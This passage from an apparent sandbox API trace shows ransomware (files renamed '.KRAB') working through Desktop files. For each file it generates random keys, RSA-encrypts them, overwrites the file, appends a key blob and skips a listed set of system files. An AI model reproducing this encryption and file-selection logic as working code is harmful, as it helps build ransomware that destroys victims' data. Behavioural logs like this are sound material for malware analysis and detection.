out: phProv=0x338f134*=0x1010820) returned 1 [0086.234] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.235] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.235] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.235] CryptGenRandom (in: hProv=0x1010820, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.235] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0086.235] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.235] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0086.237] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.237] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.237] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.237] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.238] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.238] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.238] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010b50) returned 1 [0086.239] CryptImportKey (in: hProv=0x1010b50, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0086.239] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.239] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.240] GetLastError () returned 0x0 [0086.240] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.240] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0086.240] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0086.241] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0086.241] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.241] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.242] GetLastError () returned 0x0 [0086.242] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.242] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0086.242] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\hkcfvorlm2_dkp8txm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.242] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.243] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.243] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x123d0, lpOverlapped=0x0) returned 1 [0086.259] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffedc30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.259] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x123d0, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x123d0, lpOverlapped=0x0) returned 1 [0086.259] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.259] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.263] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.264] CloseHandle (hObject=0x434) returned 1 [0086.264] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.264] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\hkcfvorlm2_dkp8txm.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\hkcfvorlm2_dkp8txm.xlsx.krab")) returned 1 [0086.265] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.265] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.265] lstrcmpW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2=".") returned 1 [0086.265] lstrcmpW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="..") returned 1 [0086.266] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="ihl4EXtYhnlE zL8Q.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp" [0086.266] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.266] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp.KRAB") returned 56 [0086.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp") returned 51 [0086.266] lstrlenW (lpString=".bmp") returned 4 [0086.266] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.266] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0086.266] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp") returned 51 [0086.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp") returned 51 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="desktop.ini") returned 1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="autorun.inf") returned 1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="ntuser.dat") returned -1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="iconcache.db") returned 1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="bootsect.bak") returned 1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="boot.ini") returned 1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="ntuser.dat.log") returned -1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="thumbs.db") returned -1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="ntldr") returned -1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="NTDETECT.COM") returned -1 [0086.267] lstrcmpiW (lpString1="ihl4EXtYhnlE zL8Q.bmp", lpString2="Bootfont.bin") returned 1 [0086.267] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.268] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10114e0) returned 1 [0086.269] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.270] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.270] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.270] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.270] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0086.270] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.270] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010e80) returned 1 [0086.272] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.272] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.272] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.272] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.272] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0086.272] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.273] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10112c0) returned 1 [0086.274] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0086.274] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.274] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.275] GetLastError () returned 0x0 [0086.275] CryptDestroyKey (hKey=0x1023338) returned 1 [0086.275] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0086.275] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0086.276] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0086.276] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.276] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.277] GetLastError () returned 0x0 [0086.277] CryptDestroyKey (hKey=0x10231f8) returned 1 [0086.277] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.277] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ihl4extyhnle zl8q.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.277] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.278] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.278] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x104d0, lpOverlapped=0x0) returned 1 [0086.302] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffefb30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.302] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x104d0, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x104d0, lpOverlapped=0x0) returned 1 [0086.302] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.303] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.306] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.307] CloseHandle (hObject=0x434) returned 1 [0086.307] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.307] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ihl4extyhnle zl8q.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ihl4EXtYhnlE zL8Q.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ihl4extyhnle zl8q.bmp.krab")) returned 1 [0086.308] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.308] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.309] lstrcmpW (lpString1="iVfn75FJu7vNuP.mp3", lpString2=".") returned 1 [0086.309] lstrcmpW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="..") returned 1 [0086.309] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="iVfn75FJu7vNuP.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3" [0086.309] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.309] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3.KRAB") returned 53 [0086.309] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3") returned 48 [0086.309] lstrlenW (lpString=".mp3") returned 4 [0086.309] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.309] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0086.309] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3") returned 48 [0086.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3") returned 48 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="desktop.ini") returned 1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="autorun.inf") returned 1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="ntuser.dat") returned -1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="iconcache.db") returned 1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="bootsect.bak") returned 1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="boot.ini") returned 1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="ntuser.dat.log") returned -1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="thumbs.db") returned -1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="ntldr") returned -1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="NTDETECT.COM") returned -1 [0086.310] lstrcmpiW (lpString1="iVfn75FJu7vNuP.mp3", lpString2="Bootfont.bin") returned 1 [0086.310] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.311] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0086.312] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.313] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.313] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.313] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.313] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0086.313] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.313] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010bd8) returned 1 [0086.315] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.315] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.315] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.316] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.316] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0086.316] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.316] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10114e0) returned 1 [0086.317] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10235f8) returned 1 [0086.317] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.317] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.318] GetLastError () returned 0x0 [0086.318] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.318] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0086.318] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10108a8) returned 1 [0086.319] CryptImportKey (in: hProv=0x10108a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0086.319] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.320] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.320] GetLastError () returned 0x0 [0086.320] CryptDestroyKey (hKey=0x10234f8) returned 1 [0086.320] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0086.320] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ivfn75fju7vnup.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.320] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.321] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.321] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x14fe1, lpOverlapped=0x0) returned 1 [0086.335] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffeb01f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.336] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x14fe1, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x14fe1, lpOverlapped=0x0) returned 1 [0086.336] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.336] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.340] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.340] CloseHandle (hObject=0x434) returned 1 [0086.341] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.341] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ivfn75fju7vnup.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\iVfn75FJu7vNuP.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ivfn75fju7vnup.mp3.krab")) returned 1 [0086.342] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.342] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.342] lstrcmpW (lpString1="Jeremy Witt's Dental Records.exe", lpString2=".") returned 1 [0086.342] lstrcmpW (lpString1="Jeremy Witt's Dental Records.exe", lpString2="..") returned 1 [0086.342] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="Jeremy Witt's Dental Records.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jeremy Witt's Dental Records.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jeremy Witt's Dental Records.exe" [0086.342] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.342] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jeremy Witt's Dental Records.exe.KRAB") returned 67 [0086.343] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jeremy Witt's Dental Records.exe") returned 62 [0086.343] lstrlenW (lpString=".exe") returned 4 [0086.343] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.344] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".exe ") returned 5 [0086.344] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.344] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.345] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.345] lstrcmpW (lpString1="Jfdn8ba607I53g.bmp", lpString2=".") returned 1 [0086.345] lstrcmpW (lpString1="Jfdn8ba607I53g.bmp", lpString2="..") returned 1 [0086.345] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="Jfdn8ba607I53g.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp" [0086.345] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.345] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp.KRAB") returned 53 [0086.345] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jfdn8ba607I53g.bmp") returned 48 [0086.345] 